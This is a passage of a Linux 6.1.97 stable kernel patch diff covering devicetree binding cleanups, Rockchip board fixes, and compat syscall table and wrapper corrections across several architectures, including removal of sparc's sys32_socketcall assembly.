+@@ -55,7 +55,7 @@ properties:
+   idle-state:
+     description: Value to set the muxer to when idle. When no value is given, it defaults to the
+       last value used.
+-    $ref: "/schemas/types.yaml#/definitions/uint32"
++    $ref: /schemas/types.yaml#/definitions/uint32
+ 
+ allOf:
+   - $ref: i2c-mux.yaml
+diff --git a/Documentation/devicetree/bindings/i2c/qcom,i2c-geni-qcom.yaml b/Documentation/devicetree/bindings/i2c/qcom,i2c-geni-qcom.yaml
+index 0e7ed00562e21..5a44fdcbdd59b 100644
+--- a/Documentation/devicetree/bindings/i2c/qcom,i2c-geni-qcom.yaml
++++ b/Documentation/devicetree/bindings/i2c/qcom,i2c-geni-qcom.yaml
+@@ -1,8 +1,8 @@
+ # SPDX-License-Identifier: (GPL-2.0-only OR BSD-2-Clause)
+ %YAML 1.2
+ ---
+-$id: "http://devicetree.org/schemas/i2c/qcom,i2c-geni-qcom.yaml#"
+-$schema: "http://devicetree.org/meta-schemas/core.yaml#"
++$id: http://devicetree.org/schemas/i2c/qcom,i2c-geni-qcom.yaml#
++$schema: http://devicetree.org/meta-schemas/core.yaml#
+ 
+ title: Qualcomm Geni based QUP I2C Controller
+ 
+diff --git a/Documentation/devicetree/bindings/i2c/st,stm32-i2c.yaml b/Documentation/devicetree/bindings/i2c/st,stm32-i2c.yaml
+index bf396e9466aaf..94b75d9f66cdb 100644
+--- a/Documentation/devicetree/bindings/i2c/st,stm32-i2c.yaml
++++ b/Documentation/devicetree/bindings/i2c/st,stm32-i2c.yaml
+@@ -90,7 +90,7 @@ properties:
+   st,syscfg-fmp:
+     description: Use to set Fast Mode Plus bit within SYSCFG when Fast Mode
+       Plus speed is selected by slave.
+-    $ref: "/schemas/types.yaml#/definitions/phandle-array"
++    $ref: /schemas/types.yaml#/definitions/phandle-array
+     items:
+       - items:
+           - description: phandle to syscfg
+diff --git a/Documentation/devicetree/bindings/i2c/xlnx,xps-iic-2.00.a.yaml b/Documentation/devicetree/bindings/i2c/xlnx,xps-iic-2.00.a.yaml
+index 8d241a703d855..f3b53ecae5625 100644
+--- a/Documentation/devicetree/bindings/i2c/xlnx,xps-iic-2.00.a.yaml
++++ b/Documentation/devicetree/bindings/i2c/xlnx,xps-iic-2.00.a.yaml
+@@ -1,8 +1,8 @@
+ # SPDX-License-Identifier: (GPL-2.0 OR BSD-2-Clause)
+ %YAML 1.2
+ ---
+-$id: "http://devicetree.org/schemas/i2c/xlnx,xps-iic-2.00.a.yaml#"
+-$schema: "http://devicetree.org/meta-schemas/core.yaml#"
++$id: http://devicetree.org/schemas/i2c/xlnx,xps-iic-2.00.a.yaml#
++$schema: http://devicetree.org/meta-schemas/core.yaml#
+ 
+ title: Xilinx IIC controller
+ 
+diff --git a/Makefile b/Makefile
+index 83658d447564f..c2148be2ba340 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 96
++SUBLEVEL = 97
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/boot/dts/rk3066a.dtsi b/arch/arm/boot/dts/rk3066a.dtsi
+index de9915d946f74..b98d5e357baf3 100644
+--- a/arch/arm/boot/dts/rk3066a.dtsi
++++ b/arch/arm/boot/dts/rk3066a.dtsi
+@@ -123,6 +123,7 @@ hdmi: hdmi@10116000 {
+ 		pinctrl-0 = <&hdmii2c_xfer>, <&hdmi_hpd>;
+ 		power-domains = <&power RK3066_PD_VIO>;
+ 		rockchip,grf = <&grf>;
++		#sound-dai-cells = <0>;
+ 		status = "disabled";
+ 
+ 		ports {
+diff --git a/arch/arm64/boot/dts/rockchip/rk3308-rock-pi-s.dts b/arch/arm64/boot/dts/rockchip/rk3308-rock-pi-s.dts
+index a71f249ed384e..edc8d2e3980d0 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3308-rock-pi-s.dts
++++ b/arch/arm64/boot/dts/rockchip/rk3308-rock-pi-s.dts
+@@ -5,6 +5,8 @@
+  */
+ 
+ /dts-v1/;
++
++#include <dt-bindings/leds/common.h>
+ #include "rk3308.dtsi"
+ 
+ / {
+@@ -24,17 +26,21 @@ chosen {
+ 	leds {
+ 		compatible = "gpio-leds";
+ 		pinctrl-names = "default";
+-		pinctrl-0 = <&green_led_gio>, <&heartbeat_led_gpio>;
++		pinctrl-0 = <&green_led>, <&heartbeat_led>;
+ 
+ 		green-led {
++			color = <LED_COLOR_ID_GREEN>;
+ 			default-state = "on";
++			function = LED_FUNCTION_POWER;
+ 			gpios = <&gpio0 RK_PA6 GPIO_ACTIVE_HIGH>;
+ 			label = "rockpis:green:power";
+ 			linux,default-trigger = "default-on";
+ 		};
+ 
+ 		blue-led {
++			color = <LED_COLOR_ID_BLUE>;
+ 			default-state = "on";
++			function = LED_FUNCTION_HEARTBEAT;
+ 			gpios = <&gpio0 RK_PA5 GPIO_ACTIVE_HIGH>;
+ 			label = "rockpis:blue:user";
+ 			linux,default-trigger = "heartbeat";
+@@ -127,10 +133,12 @@ &cpu0 {
+ };
+ 
+ &emmc {
+-	bus-width = <4>;
+ 	cap-mmc-highspeed;
+-	mmc-hs200-1_8v;
++	cap-sd-highspeed;
++	no-sdio;
+ 	non-removable;
++	pinctrl-names = "default";
++	pinctrl-0 = <&emmc_bus8 &emmc_clk &emmc_cmd>;
+ 	vmmc-supply = <&vcc_io>;
+ 	status = "okay";
+ };
+@@ -153,11 +161,11 @@ &pinctrl {
+ 	pinctrl-0 = <&rtc_32k>;
+ 
+ 	leds {
+-		green_led_gio: green-led-gpio {
++		green_led: green-led {
+ 			rockchip,pins = <0 RK_PA6 RK_FUNC_GPIO &pcfg_pull_none>;
+ 		};
+ 
+-		heartbeat_led_gpio: heartbeat-led-gpio {
++		heartbeat_led: heartbeat-led {
+ 			rockchip,pins = <0 RK_PA5 RK_FUNC_GPIO &pcfg_pull_none>;
+ 		};
+ 	};
+diff --git a/arch/arm64/boot/dts/rockchip/rk3328-rock-pi-e.dts b/arch/arm64/boot/dts/rockchip/rk3328-rock-pi-e.dts
+index 018a3a5075c72..d9905a08c6ce8 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3328-rock-pi-e.dts
++++ b/arch/arm64/boot/dts/rockchip/rk3328-rock-pi-e.dts
+@@ -186,8 +186,8 @@ &i2c1 {
+ 	rk805: pmic@18 {
+ 		compatible = "rockchip,rk805";
+ 		reg = <0x18>;
+-		interrupt-parent = <&gpio2>;
+-		interrupts = <6 IRQ_TYPE_LEVEL_LOW>;
++		interrupt-parent = <&gpio0>;
++		interrupts = <2 IRQ_TYPE_LEVEL_LOW>;
+ 		#clock-cells = <1>;
+ 		clock-output-names = "xin32k", "rk805-clkout2";
+ 		gpio-controller;
+diff --git a/arch/arm64/boot/dts/rockchip/rk3368.dtsi b/arch/arm64/boot/dts/rockchip/rk3368.dtsi
+index a4c5aaf1f4579..cac58ad951b2e 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3368.dtsi
++++ b/arch/arm64/boot/dts/rockchip/rk3368.dtsi
+@@ -790,6 +790,7 @@ spdif: spdif@ff880000 {
+ 		dma-names = "tx";
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&spdif_tx>;
++		#sound-dai-cells = <0>;
+ 		status = "disabled";
+ 	};
+ 
+@@ -801,6 +802,7 @@ i2s_2ch: i2s-2ch@ff890000 {
+ 		clocks = <&cru SCLK_I2S_2CH>, <&cru HCLK_I2S_2CH>;
+ 		dmas = <&dmac_bus 6>, <&dmac_bus 7>;
+ 		dma-names = "tx", "rx";
++		#sound-dai-cells = <0>;
+ 		status = "disabled";
+ 	};
+ 
+@@ -814,6 +816,7 @@ i2s_8ch: i2s-8ch@ff898000 {
+ 		dma-names = "tx", "rx";
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&i2s_8ch_bus>;
++		#sound-dai-cells = <0>;
+ 		status = "disabled";
+ 	};
+ 
+diff --git a/arch/arm64/include/asm/unistd32.h b/arch/arm64/include/asm/unistd32.h
+index 604a2053d0067..f464a2e0b4880 100644
+--- a/arch/arm64/include/asm/unistd32.h
++++ b/arch/arm64/include/asm/unistd32.h
+@@ -840,7 +840,7 @@ __SYSCALL(__NR_pselect6_time64, compat_sys_pselect6_time64)
+ #define __NR_ppoll_time64 414
+ __SYSCALL(__NR_ppoll_time64, compat_sys_ppoll_time64)
+ #define __NR_io_pgetevents_time64 416
+-__SYSCALL(__NR_io_pgetevents_time64, sys_io_pgetevents)
++__SYSCALL(__NR_io_pgetevents_time64, compat_sys_io_pgetevents_time64)
+ #define __NR_recvmmsg_time64 417
+ __SYSCALL(__NR_recvmmsg_time64, compat_sys_recvmmsg_time64)
+ #define __NR_mq_timedsend_time64 418
+diff --git a/arch/arm64/kernel/syscall.c b/arch/arm64/kernel/syscall.c
+index d72e8f23422da..c771e94568b9b 100644
+--- a/arch/arm64/kernel/syscall.c
++++ b/arch/arm64/kernel/syscall.c
+@@ -57,17 +57,15 @@ static void invoke_syscall(struct pt_regs *regs, unsigned int scno,
+ 	syscall_set_return_value(current, regs, 0, ret);
+ 
+ 	/*
+-	 * Ultimately, this value will get limited by KSTACK_OFFSET_MAX(),
+-	 * but not enough for arm64 stack utilization comfort. To keep
+-	 * reasonable stack head room, reduce the maximum offset to 9 bits.
++	 * This value will get limited by KSTACK_OFFSET_MAX(), which is 10
++	 * bits. The actual entropy will be further reduced by the compiler
++	 * when applying stack alignment constraints: the AAPCS mandates a
++	 * 16-byte aligned SP at function boundaries, which will remove the
++	 * 4 low bits from any entropy chosen here.
+ 	 *
+-	 * The actual entropy will be further reduced by the compiler when
+-	 * applying stack alignment constraints: the AAPCS mandates a
+-	 * 16-byte (i.e. 4-bit) aligned SP at function boundaries.
+-	 *
+-	 * The resulting 5 bits of entropy is seen in SP[8:4].
++	 * The resulting 6 bits of entropy is seen in SP[9:4].
+ 	 */
+-	choose_random_kstack_offset(get_random_u16() & 0x1FF);
++	choose_random_kstack_offset(get_random_u16());
+ }
+ 
+ static inline bool has_syscall_work(unsigned long flags)
+diff --git a/arch/csky/include/uapi/asm/unistd.h b/arch/csky/include/uapi/asm/unistd.h
+index 7ff6a2466af10..e0594b6370a65 100644
+--- a/arch/csky/include/uapi/asm/unistd.h
++++ b/arch/csky/include/uapi/asm/unistd.h
+@@ -6,6 +6,7 @@
+ #define __ARCH_WANT_SYS_CLONE3
+ #define __ARCH_WANT_SET_GET_RLIMIT
+ #define __ARCH_WANT_TIME32_SYSCALLS
++#define __ARCH_WANT_SYNC_FILE_RANGE2
+ #include <asm-generic/unistd.h>
+ 
+ #define __NR_set_thread_area	(__NR_arch_specific_syscall + 0)
+diff --git a/arch/hexagon/include/asm/syscalls.h b/arch/hexagon/include/asm/syscalls.h
+new file mode 100644
+index 0000000000000..40f2d08bec92c
+--- /dev/null
++++ b/arch/hexagon/include/asm/syscalls.h
+@@ -0,0 +1,6 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++
++#include <asm-generic/syscalls.h>
++
++asmlinkage long sys_hexagon_fadvise64_64(int fd, int advice,
++	                                  u32 a2, u32 a3, u32 a4, u32 a5);
+diff --git a/arch/hexagon/include/uapi/asm/unistd.h b/arch/hexagon/include/uapi/asm/unistd.h
+index 432c4db1b6239..21ae22306b5dc 100644
+--- a/arch/hexagon/include/uapi/asm/unistd.h
++++ b/arch/hexagon/include/uapi/asm/unistd.h
+@@ -36,5 +36,6 @@
+ #define __ARCH_WANT_SYS_VFORK
+ #define __ARCH_WANT_SYS_FORK
+ #define __ARCH_WANT_TIME32_SYSCALLS
++#define __ARCH_WANT_SYNC_FILE_RANGE2
+ 
+ #include <asm-generic/unistd.h>
+diff --git a/arch/hexagon/kernel/syscalltab.c b/arch/hexagon/kernel/syscalltab.c
+index 0fadd582cfc77..5d98bdc494ec2 100644
+--- a/arch/hexagon/kernel/syscalltab.c
++++ b/arch/hexagon/kernel/syscalltab.c
+@@ -14,6 +14,13 @@
+ #undef __SYSCALL
+ #define __SYSCALL(nr, call) [nr] = (call),
+ 
++SYSCALL_DEFINE6(hexagon_fadvise64_64, int, fd, int, advice,
++		SC_ARG64(offset), SC_ARG64(len))
++{
++	return ksys_fadvise64_64(fd, SC_VAL64(loff_t, offset), SC_VAL64(loff_t, len), advice);
++}
++#define sys_fadvise64_64 sys_hexagon_fadvise64_64
++
+ void *sys_call_table[__NR_syscalls] = {
+ #include <asm/unistd.h>
+ };
+diff --git a/arch/mips/kernel/syscalls/syscall_n32.tbl b/arch/mips/kernel/syscalls/syscall_n32.tbl
+index 253ff994ed2ec..5d952a57c0eed 100644
+--- a/arch/mips/kernel/syscalls/syscall_n32.tbl
++++ b/arch/mips/kernel/syscalls/syscall_n32.tbl
+@@ -354,7 +354,7 @@
+ 412	n32	utimensat_time64		sys_utimensat
+ 413	n32	pselect6_time64			compat_sys_pselect6_time64
+ 414	n32	ppoll_time64			compat_sys_ppoll_time64
+-416	n32	io_pgetevents_time64		sys_io_pgetevents
++416	n32	io_pgetevents_time64		compat_sys_io_pgetevents_time64
+ 417	n32	recvmmsg_time64			compat_sys_recvmmsg_time64
+ 418	n32	mq_timedsend_time64		sys_mq_timedsend
+ 419	n32	mq_timedreceive_time64		sys_mq_timedreceive
+diff --git a/arch/mips/kernel/syscalls/syscall_o32.tbl b/arch/mips/kernel/syscalls/syscall_o32.tbl
+index 8f243e35a7b20..7ab572040f534 100644
+--- a/arch/mips/kernel/syscalls/syscall_o32.tbl
++++ b/arch/mips/kernel/syscalls/syscall_o32.tbl
+@@ -403,7 +403,7 @@
+ 412	o32	utimensat_time64		sys_utimensat			sys_utimensat
+ 413	o32	pselect6_time64			sys_pselect6			compat_sys_pselect6_time64
+ 414	o32	ppoll_time64			sys_ppoll			compat_sys_ppoll_time64
+-416	o32	io_pgetevents_time64		sys_io_pgetevents		sys_io_pgetevents
++416	o32	io_pgetevents_time64		sys_io_pgetevents		compat_sys_io_pgetevents_time64
+ 417	o32	recvmmsg_time64			sys_recvmmsg			compat_sys_recvmmsg_time64
+ 418	o32	mq_timedsend_time64		sys_mq_timedsend		sys_mq_timedsend
+ 419	o32	mq_timedreceive_time64		sys_mq_timedreceive		sys_mq_timedreceive
+diff --git a/arch/parisc/Kconfig b/arch/parisc/Kconfig
+index abf39ecda6fb1..5762633ea95e4 100644
+--- a/arch/parisc/Kconfig
++++ b/arch/parisc/Kconfig
+@@ -14,6 +14,7 @@ config PARISC
+ 	select ARCH_HAS_UBSAN_SANITIZE_ALL
+ 	select ARCH_HAS_PTE_SPECIAL
+ 	select ARCH_NO_SG_CHAIN
++	select ARCH_SPLIT_ARG64 if !64BIT
+ 	select ARCH_SUPPORTS_HUGETLBFS if PA20
+ 	select ARCH_SUPPORTS_MEMORY_FAILURE
+ 	select ARCH_STACKWALK
+diff --git a/arch/parisc/kernel/sys_parisc32.c b/arch/parisc/kernel/sys_parisc32.c
+index 2a12a547b447b..826c8e51b5853 100644
+--- a/arch/parisc/kernel/sys_parisc32.c
++++ b/arch/parisc/kernel/sys_parisc32.c
+@@ -23,12 +23,3 @@ asmlinkage long sys32_unimplemented(int r26, int r25, int r24, int r23,
+     	current->comm, current->pid, r20);
+     return -ENOSYS;
+ }
+-
+-asmlinkage long sys32_fanotify_mark(compat_int_t fanotify_fd, compat_uint_t flags,
+-	compat_uint_t mask0, compat_uint_t mask1, compat_int_t dfd,
+-	const char  __user * pathname)
+-{
+-	return sys_fanotify_mark(fanotify_fd, flags,
+-			((__u64)mask1 << 32) | mask0,
+-			 dfd, pathname);
+-}
+diff --git a/arch/parisc/kernel/syscalls/syscall.tbl b/arch/parisc/kernel/syscalls/syscall.tbl
+index 0e42fceb2d5e2..42702f5d49f28 100644
+--- a/arch/parisc/kernel/syscalls/syscall.tbl
++++ b/arch/parisc/kernel/syscalls/syscall.tbl
+@@ -108,7 +108,7 @@
+ 95	common	fchown			sys_fchown
+ 96	common	getpriority		sys_getpriority
+ 97	common	setpriority		sys_setpriority
+-98	common	recv			sys_recv
++98	common	recv			sys_recv			compat_sys_recv
+ 99	common	statfs			sys_statfs			compat_sys_statfs
+ 100	common	fstatfs			sys_fstatfs			compat_sys_fstatfs
+ 101	common	stat64			sys_stat64
+@@ -135,7 +135,7 @@
+ 120	common	clone			sys_clone_wrapper
+ 121	common	setdomainname		sys_setdomainname
+ 122	common	sendfile		sys_sendfile			compat_sys_sendfile
+-123	common	recvfrom		sys_recvfrom
++123	common	recvfrom		sys_recvfrom			compat_sys_recvfrom
+ 124	32	adjtimex		sys_adjtimex_time32
+ 124	64	adjtimex		sys_adjtimex
+ 125	common	mprotect		sys_mprotect
+@@ -364,7 +364,7 @@
+ 320	common	accept4			sys_accept4
+ 321	common	prlimit64		sys_prlimit64
+ 322	common	fanotify_init		sys_fanotify_init
+-323	common	fanotify_mark		sys_fanotify_mark		sys32_fanotify_mark
++323	common	fanotify_mark		sys_fanotify_mark		compat_sys_fanotify_mark
+ 324	32	clock_adjtime		sys_clock_adjtime32
+ 324	64	clock_adjtime		sys_clock_adjtime
+ 325	common	name_to_handle_at	sys_name_to_handle_at
+diff --git a/arch/powerpc/kernel/syscalls/syscall.tbl b/arch/powerpc/kernel/syscalls/syscall.tbl
+index a0be127475b1f..1195f88199caa 100644
+--- a/arch/powerpc/kernel/syscalls/syscall.tbl
++++ b/arch/powerpc/kernel/syscalls/syscall.tbl
+@@ -230,8 +230,10 @@
+ 178	nospu 	rt_sigsuspend			sys_rt_sigsuspend		compat_sys_rt_sigsuspend
+ 179	32	pread64				sys_ppc_pread64			compat_sys_ppc_pread64
+ 179	64	pread64				sys_pread64
++179	spu	pread64				sys_pread64
+ 180	32	pwrite64			sys_ppc_pwrite64		compat_sys_ppc_pwrite64
+ 180	64	pwrite64			sys_pwrite64
++180	spu	pwrite64			sys_pwrite64
+ 181	common	chown				sys_chown
+ 182	common	getcwd				sys_getcwd
+ 183	common	capget				sys_capget
+@@ -246,6 +248,7 @@
+ 190	common	ugetrlimit			sys_getrlimit			compat_sys_getrlimit
+ 191	32	readahead			sys_ppc_readahead		compat_sys_ppc_readahead
+ 191	64	readahead			sys_readahead
++191	spu	readahead			sys_readahead
+ 192	32	mmap2				sys_mmap2			compat_sys_mmap2
+ 193	32	truncate64			sys_ppc_truncate64		compat_sys_ppc_truncate64
+ 194	32	ftruncate64			sys_ppc_ftruncate64		compat_sys_ppc_ftruncate64
+@@ -293,6 +296,7 @@
+ 232	nospu	set_tid_address			sys_set_tid_address
+ 233	32	fadvise64			sys_ppc32_fadvise64		compat_sys_ppc32_fadvise64
+ 233	64	fadvise64			sys_fadvise64
++233	spu	fadvise64			sys_fadvise64
+ 234	nospu	exit_group			sys_exit_group
+ 235	nospu	lookup_dcookie			sys_lookup_dcookie		compat_sys_lookup_dcookie
+ 236	common	epoll_create			sys_epoll_create
+@@ -502,7 +506,7 @@
+ 412	32	utimensat_time64		sys_utimensat			sys_utimensat
+ 413	32	pselect6_time64			sys_pselect6			compat_sys_pselect6_time64
+ 414	32	ppoll_time64			sys_ppoll			compat_sys_ppoll_time64
+-416	32	io_pgetevents_time64		sys_io_pgetevents		sys_io_pgetevents
++416	32	io_pgetevents_time64		sys_io_pgetevents		compat_sys_io_pgetevents_time64
+ 417	32	recvmmsg_time64			sys_recvmmsg			compat_sys_recvmmsg_time64
+ 418	32	mq_timedsend_time64		sys_mq_timedsend		sys_mq_timedsend
+ 419	32	mq_timedreceive_time64		sys_mq_timedreceive		sys_mq_timedreceive
+diff --git a/arch/riscv/kernel/stacktrace.c b/arch/riscv/kernel/stacktrace.c
+index 528ec7cc9a622..0d3f00eb0baee 100644
+--- a/arch/riscv/kernel/stacktrace.c
++++ b/arch/riscv/kernel/stacktrace.c
+@@ -156,7 +156,7 @@ unsigned long __get_wchan(struct task_struct *task)
+ 	return pc;
+ }
+ 
+-noinline void arch_stack_walk(stack_trace_consume_fn consume_entry, void *cookie,
++noinline noinstr void arch_stack_walk(stack_trace_consume_fn consume_entry, void *cookie,
+ 		     struct task_struct *task, struct pt_regs *regs)
+ {
+ 	walk_stackframe(task, regs, consume_entry, cookie);
+diff --git a/arch/s390/include/asm/entry-common.h b/arch/s390/include/asm/entry-common.h
+index 000de2b1e67a2..74124092b1c7e 100644
+--- a/arch/s390/include/asm/entry-common.h
++++ b/arch/s390/include/asm/entry-common.h
+@@ -55,7 +55,7 @@ static __always_inline void arch_exit_to_user_mode(void)
+ static inline void arch_exit_to_user_mode_prepare(struct pt_regs *regs,
+ 						  unsigned long ti_work)
+ {
+-	choose_random_kstack_offset(get_tod_clock_fast() & 0xff);
++	choose_random_kstack_offset(get_tod_clock_fast());
+ }
+ 
+ #define arch_exit_to_user_mode_prepare arch_exit_to_user_mode_prepare
+diff --git a/arch/s390/kernel/syscalls/syscall.tbl b/arch/s390/kernel/syscalls/syscall.tbl
+index 799147658dee2..42acea15441dd 100644
+--- a/arch/s390/kernel/syscalls/syscall.tbl
++++ b/arch/s390/kernel/syscalls/syscall.tbl
+@@ -418,7 +418,7 @@
+ 412	32	utimensat_time64	-				sys_utimensat
+ 413	32	pselect6_time64		-				compat_sys_pselect6_time64
+ 414	32	ppoll_time64		-				compat_sys_ppoll_time64
+-416	32	io_pgetevents_time64	-				sys_io_pgetevents
++416	32	io_pgetevents_time64	-				compat_sys_io_pgetevents_time64
+ 417	32	recvmmsg_time64		-				compat_sys_recvmmsg_time64
+ 418	32	mq_timedsend_time64	-				sys_mq_timedsend
+ 419	32	mq_timedreceive_time64	-				sys_mq_timedreceive
+diff --git a/arch/s390/pci/pci_irq.c b/arch/s390/pci/pci_irq.c
+index a2b42a63a53ba..04c19ab93a329 100644
+--- a/arch/s390/pci/pci_irq.c
++++ b/arch/s390/pci/pci_irq.c
+@@ -410,7 +410,7 @@ static void __init cpu_enable_directed_irq(void *unused)
+ 	union zpci_sic_iib iib = {{0}};
+ 	union zpci_sic_iib ziib = {{0}};
+ 
+-	iib.cdiib.dibv_addr = (u64) zpci_ibv[smp_processor_id()]->vector;
++	iib.cdiib.dibv_addr = virt_to_phys(zpci_ibv[smp_processor_id()]->vector);
+ 
+ 	zpci_set_irq_ctrl(SIC_IRQ_MODE_SET_CPU, 0, &iib);
+ 	zpci_set_irq_ctrl(SIC_IRQ_MODE_D_SINGLE, PCI_ISC, &ziib);
+diff --git a/arch/sh/kernel/sys_sh32.c b/arch/sh/kernel/sys_sh32.c
+index 9dca568509a5e..d6f4afcb0e870 100644
+--- a/arch/sh/kernel/sys_sh32.c
++++ b/arch/sh/kernel/sys_sh32.c
+@@ -59,3 +59,14 @@ asmlinkage int sys_fadvise64_64_wrapper(int fd, u32 offset0, u32 offset1,
+ 				 (u64)len0 << 32 | len1, advice);
+ #endif
+ }
++
++/*
++ * swap the arguments the way that libc wants them instead of
++ * moving flags ahead of the 64-bit nbytes argument
++ */
++SYSCALL_DEFINE6(sh_sync_file_range6, int, fd, SC_ARG64(offset),
++                SC_ARG64(nbytes), unsigned int, flags)
++{
++        return ksys_sync_file_range(fd, SC_VAL64(loff_t, offset),
++                                    SC_VAL64(loff_t, nbytes), flags);
++}
+diff --git a/arch/sh/kernel/syscalls/syscall.tbl b/arch/sh/kernel/syscalls/syscall.tbl
+index 2de85c977f54f..4741e5c8ac61c 100644
+--- a/arch/sh/kernel/syscalls/syscall.tbl
++++ b/arch/sh/kernel/syscalls/syscall.tbl
+@@ -321,7 +321,7 @@
+ 311	common	set_robust_list			sys_set_robust_list
+ 312	common	get_robust_list			sys_get_robust_list
+ 313	common	splice				sys_splice
+-314	common	sync_file_range			sys_sync_file_range
++314	common	sync_file_range			sys_sh_sync_file_range6
+ 315	common	tee				sys_tee
+ 316	common	vmsplice			sys_vmsplice
+ 317	common	move_pages			sys_move_pages
+@@ -395,6 +395,7 @@
+ 385	common	pkey_alloc			sys_pkey_alloc
+ 386	common	pkey_free			sys_pkey_free
+ 387	common	rseq				sys_rseq
++388	common	sync_file_range2		sys_sync_file_range2
+ # room for arch specific syscalls
+ 393	common	semget				sys_semget
+ 394	common	semctl				sys_semctl
+diff --git a/arch/sparc/kernel/sys32.S b/arch/sparc/kernel/sys32.S
+index a45f0f31fe51a..a3d308f2043e5 100644
+--- a/arch/sparc/kernel/sys32.S
++++ b/arch/sparc/kernel/sys32.S
+@@ -18,224 +18,3 @@ sys32_mmap2:
+ 	sethi		%hi(sys_mmap), %g1
+ 	jmpl		%g1 + %lo(sys_mmap), %g0
+ 	 sllx		%o5, 12, %o5
+-
+-	.align		32
+-	.globl		sys32_socketcall
+-sys32_socketcall:	/* %o0=call, %o1=args */
+-	cmp		%o0, 1
+-	bl,pn		%xcc, do_einval
+-	 cmp		%o0, 18
+-	bg,pn		%xcc, do_einval
+-	 sub		%o0, 1, %o0
+-	sllx		%o0, 5, %o0
+-	sethi		%hi(__socketcall_table_begin), %g2
+-	or		%g2, %lo(__socketcall_table_begin), %g2
+-	jmpl		%g2 + %o0, %g0
+-	 nop
+-do_einval:
+-	retl
+-	 mov		-EINVAL, %o0
+-
+-	.align		32
+-__socketcall_table_begin:
+-
+-	/* Each entry is exactly 32 bytes. */
+-do_sys_socket: /* sys_socket(int, int, int) */
+-1:	ldswa		[%o1 + 0x0] %asi, %o0
+-	sethi		%hi(sys_socket), %g1
+-2:	ldswa		[%o1 + 0x8] %asi, %o2
+-	jmpl		%g1 + %lo(sys_socket), %g0
+-3:	 ldswa		[%o1 + 0x4] %asi, %o1
+-	nop
+-	nop
+-	nop
+-do_sys_bind: /* sys_bind(int fd, struct sockaddr *, int) */
+-4:	ldswa		[%o1 + 0x0] %asi, %o0
+-	sethi		%hi(sys_bind), %g1
+-5:	ldswa		[%o1 + 0x8] %asi, %o2
+-	jmpl		%g1 + %lo(sys_bind), %g0
+-6:	 lduwa		[%o1 + 0x4] %asi, %o1
+-	nop
+-	nop
+-	nop
+-do_sys_connect: /* sys_connect(int, struct sockaddr *, int) */
+-7:	ldswa		[%o1 + 0x0] %asi, %o0
+-	sethi		%hi(sys_connect), %g1
+-8:	ldswa		[%o1 + 0x8] %asi, %o2
+-	jmpl		%g1 + %lo(sys_connect), %g0
+-9:	 lduwa		[%o1 + 0x4] %asi, %o1
+-	nop
+-	nop
+-	nop
+-do_sys_listen: /* sys_listen(int, int) */
+-10:	ldswa		[%o1 + 0x0] %asi, %o0
+-	sethi		%hi(sys_listen), %g1
+-	jmpl		%g1 + %lo(sys_listen), %g0
+-11:	 ldswa		[%o1 + 0x4] %asi, %o1
+-	nop
+-	nop
+-	nop
+-	nop
+-do_sys_accept: /* sys_accept(int, struct sockaddr *, int *) */
+-12:	ldswa		[%o1 + 0x0] %asi, %o0
+-	sethi		%hi(sys_accept), %g1
+-13:	lduwa		[%o1 + 0x8] %asi, %o2
+-	jmpl		%g1 + %lo(sys_accept), %g0
+-14:	 lduwa		[%o1 + 0x4] %asi, %o1
+-	nop
+-	nop
+-	nop
+-do_sys_getsockname: /* sys_getsockname(int, struct sockaddr *, int *) */
+-15:	ldswa		[%o1 + 0x0] %asi, %o0
+-	sethi		%hi(sys_getsockname), %g1
+-16:	lduwa		[%o1 + 0x8] %asi, %o2
+-	jmpl		%g1 + %lo(sys_getsockname), %g0
+-17:	 lduwa		[%o1 + 0x4] %asi, %o1
+-	nop
+-	nop
+-	nop
+-do_sys_getpeername: /* sys_getpeername(int, struct sockaddr *, int *) */
+-18:	ldswa		[%o1 + 0x0] %asi, %o0
+-	sethi		%hi(sys_getpeername), %g1
+-19:	lduwa		[%o1 + 0x8] %asi, %o2
+-	jmpl		%g1 + %lo(sys_getpeername), %g0
+-20:	 lduwa		[%o1 + 0x4] %asi, %o1
+-	nop
+-	nop
+-	nop
+-do_sys_socketpair: /* sys_socketpair(int, int, int, int *) */
+-21:	ldswa		[%o1 + 0x0] %asi, %o0
+-	sethi		%hi(sys_socketpair), %g1
+-22:	ldswa		[%o1 + 0x8] %asi, %o2
+-23:	lduwa		[%o1 + 0xc] %asi, %o3
+-	jmpl		%g1 + %lo(sys_socketpair), %g0
+-24:	 ldswa		[%o1 + 0x4] %asi, %o1
+-	nop
+-	nop
+-do_sys_send: /* sys_send(int, void *, size_t, unsigned int) */
+-25:	ldswa		[%o1 + 0x0] %asi, %o0
+-	sethi		%hi(sys_send), %g1
+-26:	lduwa		[%o1 + 0x8] %asi, %o2
+-27:	lduwa		[%o1 + 0xc] %asi, %o3
+-	jmpl		%g1 + %lo(sys_send), %g0
+-28:	 lduwa		[%o1 + 0x4] %asi, %o1
+-	nop
+-	nop
+-do_sys_recv: /* sys_recv(int, void *, size_t, unsigned int) */
+-29:	ldswa		[%o1 + 0x0] %asi, %o0
+-	sethi		%hi(sys_recv), %g1
+-30:	lduwa		[%o1 + 0x8] %asi, %o2
+-31:	lduwa		[%o1 + 0xc] %asi, %o3
+-	jmpl		%g1 + %lo(sys_recv), %g0
+-32:	 lduwa		[%o1 + 0x4] %asi, %o1
+-	nop
+-	nop
+-do_sys_sendto: /* sys_sendto(int, u32, compat_size_t, unsigned int, u32, int) */
+-33:	ldswa		[%o1 + 0x0] %asi, %o0
+-	sethi		%hi(sys_sendto), %g1
+-34:	lduwa		[%o1 + 0x8] %asi, %o2
+-35:	lduwa		[%o1 + 0xc] %asi, %o3
+-36:	lduwa		[%o1 + 0x10] %asi, %o4
+-37:	ldswa		[%o1 + 0x14] %asi, %o5
+-	jmpl		%g1 + %lo(sys_sendto), %g0
+-38:	 lduwa		[%o1 + 0x4] %asi, %o1
+-do_sys_recvfrom: /* sys_recvfrom(int, u32, compat_size_t, unsigned int, u32, u32) */
+-39:	ldswa		[%o1 + 0x0] %asi, %o0
+-	sethi		%hi(sys_recvfrom), %g1
